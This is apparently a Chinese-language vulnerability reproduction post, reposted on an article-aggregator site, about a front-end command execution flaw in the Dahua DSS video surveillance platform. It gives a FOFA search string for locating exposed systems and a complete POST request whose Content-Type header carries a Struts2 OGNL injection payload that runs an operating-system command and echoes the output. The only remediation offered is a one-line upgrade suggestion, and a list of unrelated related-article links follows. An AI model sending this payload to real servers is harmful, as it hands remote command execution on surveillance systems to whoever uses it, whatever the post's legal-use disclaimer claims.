大華DSS user_toLoginPage.action命令執行漏洞

免責聲明

本文章僅做網絡安全技術研究使用!嚴禁用于非法犯罪行為,請嚴格遵守國家法律法規;請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者無關。使用本文所提供的信息或工具即視為同意本免責聲明,并承諾遵守相關法律法規和道德規范。

產品簡介

大華DSS 數字監控系統是大華開發的一款安防視頻監控系統,擁有實時監視、云臺操作、錄像回放、報警處理、設備管理等功能。

漏洞概述

大華存在前臺命令執行漏洞,攻擊者可以通過此漏洞獲取服務器權限。

資產測繪

app=“dahua-DSS”
在這里插入圖片描述

漏洞復現

POST /config/user_toLoginPage.action HTTP/1.1
Host: your_ip
Connection: close
Cookie: JSESSIONID=B8790DC4F77C2EA50A17076F9D08E9D1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 0

在這里插入圖片描述

修復建議

升級至最新安全版本。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/41581.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/41581.shtml
英文地址,請注明出處:http://en.pswp.cn/web/41581.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

go語言day11 錯誤 defer(),panic(),recover()

go語言day11 錯誤 defer(),panic(),recover()

錯誤: 創建錯誤 1)fmt包下提供的方法 fmt.Errorf(" 格式化字符串信息 " , 空接口類型對象 ) 2)errors包下提供的方法 errors.New(" 字符串信息 ") 創建自定義錯誤 需要實現error接口,而error接口…
閱讀更多...
JavaSe系列二十七: Java正則表達式

JavaSe系列二十七: Java正則表達式

正則表達式 為什么要學習正則表達式再提幾個問題解決之道-正則表達式正則表達式基本介紹介紹 正則表達式底層實現實例分析 正則表達式語法基本介紹元字符-轉義號 \\\\元字符-字符匹配符元字符-選擇匹配符元字符-限定符元字符-定位符分組非貪婪匹配 應用實例對字符串進行如下驗證…
閱讀更多...
學習筆記——動態路由——OSPF聚合(匯總)

學習筆記——動態路由——OSPF聚合(匯總)

十一、OSPF聚合(匯總) 1、路由聚合(匯總) 路由匯總是一種重要的思想,在大型的項目中是必須考慮的一個重點事項。隨著網絡的規模越來越大,網絡中的設備所需維護的路由表項也就會越來越多,路由表的規模也就會逐漸變大,而路由表是需…
閱讀更多...
React中的useMemo和memo

React中的useMemo和memo

引言 React是一個聲明式的JavaScript庫,用于構建用戶界面。在開發過程中,性能優化是一個重要的方面。useMemo和memo是React提供的工具,用于幫助開發者避免不必要的渲染和計算,從而提升應用性能。 問題背景 在React應用中&#…
閱讀更多...
實現antd designable平臺的組件拖拽功能

實現antd designable平臺的組件拖拽功能

平臺:designable設計器 github:designable 目錄 1 背景2 技術棧3 組件拖拽和放置3.1 類型定義3.2 拖拽3.3 放置 1 背景 由于業務需求,我們需要實現designable平臺的一個簡易版的組件拖拽功能。 #mermaid-svg-QrxSDGe9YyGG3LbQ {font-family:…
閱讀更多...
【Unity2D 2022:UI】制作角色血條

【Unity2D 2022:UI】制作角色血條

一、創建血底UI 1. 創建畫布(Canvas) 2. 在畫布上添加血底圖像(Image)子物體 二、編輯血底UI 1. 將血底圖片拖入源圖像(Source Image)中 2. 點擊設置為圖片的原大小(Set Native Size&#x…
閱讀更多...
設計一個會員卡系統

設計一個會員卡系統

會員卡系統在現代商業環境中是一個重要的客戶關系管理工具。通過會員卡系統,企業可以有效地增加客戶粘性,提高客戶滿意度,進而提升銷售額。本文將詳細討論如何設計一個全面的會員卡系統,包括會員卡的類型、權益設計、續費規則、升…
閱讀更多...
Java | Leetcode Java題解之第219題存在重復元素II

Java | Leetcode Java題解之第219題存在重復元素II

題目&#xff1a; 題解&#xff1a; class Solution {public boolean containsNearbyDuplicate(int[] nums, int k) {Set<Integer> set new HashSet<Integer>();int length nums.length;for (int i 0; i < length; i) {if (i > k) {set.remove(nums[i - …
閱讀更多...
# 三 JS的流程控制和函數

# 三 JS的流程控制和函數

三 JS的流程控制和函數 3.1 JS分支結構 if結構 這里的if結構幾乎和JAVA中的一樣,需要注意的是 if()中的非空字符串會被認為是trueif()中的非零數字會被認為是true 代碼 if(false){// 非空字符串 if判斷為trueconsole.log(true) }else{console.log(false) } if(){// 長度為0…
閱讀更多...
GitHub詳解:代碼托管與協作開發平臺

GitHub詳解:代碼托管與協作開發平臺

文章目錄 一、GitHub簡介二、GitHub的核心功能2.1 倉庫&#xff08;Repository&#xff09;2.2 版本控制與分支&#xff08;Branch&#xff09;2.3 Pull Request2.4 Issues與Projects2.5 GitHub Actions 三、GitHub的使用方法3.1 注冊與登錄3.2 創建和管理倉庫3.3 使用Git進行代…
閱讀更多...
【密碼學】密碼學中的四種攻擊方式和兩種攻擊手段

【密碼學】密碼學中的四種攻擊方式和兩種攻擊手段

在密碼學中&#xff0c;攻擊方式通常指的是密碼分析者試圖破解加密信息或繞過安全機制的各種策略。根據密碼分析者對明文、密文以及加密算法的知識程度&#xff0c;攻擊可以分為以下四種基本類型&#xff1a; 一、四種攻擊的定義 &#xff08;1&#xff09;唯密文攻擊(COA, C…
閱讀更多...
PCIe驅動開發(2)— 第一個簡單驅動編寫和測試

PCIe驅動開發(2)— 第一個簡單驅動編寫和測試

PCIe驅動開發&#xff08;2&#xff09;— 第一個簡單驅動編寫和測試 一、前言 教程參考&#xff1a;02_實戰部分_PCIE設備測試 教程參考&#xff1a;03_PCIe設備驅動源碼解析 二、驅動編寫 新建hello_pcie.c文件 touch hello_pcie.c然后編寫內容如下所示&#xff1a; #i…
閱讀更多...
【持續集成_03課_Jenkins生成Allure報告及Sonar靜態掃描】

【持續集成_03課_Jenkins生成Allure報告及Sonar靜態掃描】

1、 一、構建之后的配置 1、安裝allure插件 安裝好之后&#xff0c;可以在這里搜到已經安裝的 2、配置allure的allure-commandline 正常配置&#xff0c;是要么在工具里配置&#xff0c;要么在系統里配置 allure-commandline是在工具里進行配置 兩種方式進行配置 1&#xff…
閱讀更多...
原生JavaScript實現錄屏功能

原生JavaScript實現錄屏功能

1. 前言 使用JavaScript實現瀏覽器中打開系統錄屏功能 示例圖: 2. 源碼 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta http-equiv"X-UA-Compatible" content"IEedge" /><…
閱讀更多...
LabVIEW機器視覺系統中的圖像畸變、校準和矯正

LabVIEW機器視覺系統中的圖像畸變、校準和矯正

在機器視覺應用中&#xff0c;圖像畸變、校準和矯正是確保圖像準確性的關鍵步驟。LabVIEW作為一種強大的圖像處理和分析工具&#xff0c;提供了一系列功能來處理這些問題。以下是對圖像畸變、校準和矯正的詳細介紹。 圖像畸變 圖像畸變 是指由于攝像鏡頭的光學特性或拍攝角度問…
閱讀更多...
算法重新刷題

算法重新刷題

基礎算法 前綴和 一維前綴和 [USACO16JAN] Subsequences Summing to Sevens S - 洛谷 這一題主要是需要結合數學知識來求解&#xff0c; #include <iostream> #include <cstring> #include <cstdio> #include <algorithm>using namespace std;con…
閱讀更多...
06pymysql

06pymysql

【一】pymysql 1.我們可以利用pymysql在python中操作數據庫 原理是pyMySQL-->是封裝好的執行subprocess鏈接數據庫執行數據庫命令的模塊 官網&#xff1a;https://zetcode.com/python/pymysql/ 【二】使用示例 import pymysql from pymysql.cursors import DictCursor ?…
閱讀更多...
進入防火墻Web管理頁面(eNSP USG6000V)和管理員模塊

進入防火墻Web管理頁面(eNSP USG6000V)和管理員模塊

1、進入防火墻Web管理頁面 USG系列是華為提供的一款高端防火墻產品&#xff0c;其特點在于提供強大的安全防護能力和靈活的擴展性。 以eNSP中的USG6000為例&#xff1a; MGMT口&#xff08;web管理口&#xff09;&#xff1a;對應設備上的G0/0/0口&#xff0c;上面初始配有一…
閱讀更多...
如何在Spring Boot中實現實時通知

如何在Spring Boot中實現實時通知

如何在Spring Boot中實現實時通知 大家好&#xff0c;我是免費搭建查券返利機器人省錢賺傭金就用微賺淘客系統3.0的小編&#xff0c;也是冬天不穿秋褲&#xff0c;天冷也要風度的程序猿&#xff01;今天我們將討論如何在Spring Boot應用中實現實時通知功能&#xff0c;這在現代…
閱讀更多...
Java的awt和swing的區別

Java的awt和swing的區別

AWT&#xff08;Abstract Window Toolkit&#xff09;和Swing都是Java中用于創建圖形用戶界面&#xff08;GUI&#xff09;的工具包&#xff0c;但它們之間存在一些關鍵的區別。下面我將通過具體的例子來說明這些區別&#xff1a; 1. 跨平臺性能 AWT&#xff1a; AWT是基于本…
閱讀更多...
最新文章

Copyright @ 2022~2023